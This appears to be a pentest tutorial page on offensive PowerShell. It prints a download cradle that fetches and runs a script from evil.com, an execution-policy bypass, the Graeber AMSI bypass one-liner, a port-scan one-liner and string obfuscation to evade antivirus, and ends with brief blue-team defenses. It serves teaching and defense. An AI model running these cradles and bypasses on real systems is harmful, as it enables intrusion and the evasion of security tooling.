PowerShell for Pentesters - WhoisNexus Academy

PowerShell is the most powerful administration tool for Windows. It is also the most powerful hacking tool. It has full access to the .NET framework, Actve Directory, and the Win32 API. Pentesters prefer it because it is "Living off the Land" (LolBin). It runs in memory, leaving no files on disk.

Execution Policy is NOT a Security Boundary

You might think `Set-ExecutionPolicy Restricted` stops hackers. It does not. It is a safety feature for users, not a security feature.
Bypass: `powershell.exe -ExecutionPolicy Bypass -File evil.ps1`

1. The Download Cradle

The first thing a payload does is download the full malware from the internet into RAM.

# The classic cradle
IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')

# The "Evasion" cradle (using aliases)
IEX (iwr 'http://evil.com/payload.ps1' -UseBasicParsing)
        

IEX (Invoke-Expression) runs the string as code immediately. The file never touches the hard drive.

2. Enumeration

PowerShell is native to Active Directory.

# Get Domain Information
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# Port Scan (One Liner)
1..1024 | % { echo ((new-object Net.Sockets.TcpClient).Connect("192.168.1.10", $_)) "Port $_ is open!" } 2>$null
        

3. Offensive Frameworks

Why write scripts from scratch? Use frameworks.

3.1. PowerSploit / PowerView

Written by Will Schroeder (HarmJ0y). The gold standard for AD recon.
Find-LocalAdminAccess: Scans the network to find PCs where your current user has Admin rights.
Get-NetSession: Finds where Domain Admins are logged in (so you can steal their tokens).

3.2. Empire

A full C2 (Command & Control) framework based on PowerShell. It's largely deprecated by Covenant/Sliver now, but the concepts remain.

4. AMSI (Antimalware Scan Interface)

Microsoft realized PowerShell was too dangerous. They added AMSI.
When you run `Invoke-Expression`, AMSI takes the string and sends it to the installed Antivirus (Defender) before execution. If Defender says "Malicious", execution is blocked.

4.1. AMSI Bypass

Since AMSI runs inside the PowerShell process, we can patch it out.
The "Matt Graeber" one-liner:

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
        

This tells PowerShell: "AMSI failed to initialize (wink), so just skip scanning."
Note: This specific string is flagged, so you have to obfuscate it now.

5. Obfuscation

To evade AMSI, we confuse the string.

# Detectable
"Invoke-Mimikatz"

# Undetectable
$a = "Invoke-"
$b = "Mimi"
$c = "katz"
IEX ($a + $b + $c)
        

Tools like Invoke-Obfuscation automate this, inserting backticks (`), random casing, and whitespace.

Blue Team Defense

1. Constrained Language Mode (CLM): Limits access to .NET APIs.
2. Script Block Logging (Event 4104): Logs the full de-obfuscated code (because obfuscation happens before execution, but logging happens at execution).
3. Disable PowerShell v2: Remove the legacy version that doesn't support AMSI.